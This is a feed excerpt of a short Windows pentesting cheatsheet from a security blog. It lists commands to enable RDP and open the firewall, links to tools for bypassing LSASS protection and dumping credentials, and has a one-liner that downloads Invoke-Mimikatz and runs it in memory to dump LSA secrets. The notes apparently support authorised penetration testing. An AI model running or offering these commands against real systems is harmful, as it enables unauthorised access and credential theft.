microsoft – \x44\x61\x6e\x6b / Dank adventures in security Mon, 27 Mar 2023 05:25:33 +0000 en-US hourly 1 https://wordpress.org/?v=6.1.1 Cheatsheet – Microsoft Windows Pentesting /2021/07/19/cheatsheet-microsoft-windows/ /2021/07/19/cheatsheet-microsoft-windows/#respond Mon, 19 Jul 2021 10:26:38 +0000 /blog/?p=71 Random Notes:

  • Testing for CLM: 
$ExecutionContext.SessionState.LanguageMode
  • Enable RDP & Firewall:
    • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
    • netsh firewall set service type = remotedesktop mode = enable

Local Privilege Escalation:

Cheatsheet Resources:

  • https://book.hacktricks.xyz/windows/windows-local-privilege-escalation

Dumping Credentials:

Bypassing PPL:

  • https://github.com/itm4n/PPLdump
  • https://github.com/RedCursorSecurityConsulting/PPLKiller

Dump LSASS bypassing AV/EDR

  • https://github.com/outflanknl/Dumpert

Mimikatz:

  • https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz
    • iex (New-Object Net.Webclient).DownloadString(“https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1”)
    • Invoke-Mimikatz -Command ‘”token::elevate” “lsadump::secrets”‘
]]> /2021/07/19/cheatsheet-microsoft-windows/feed/ 0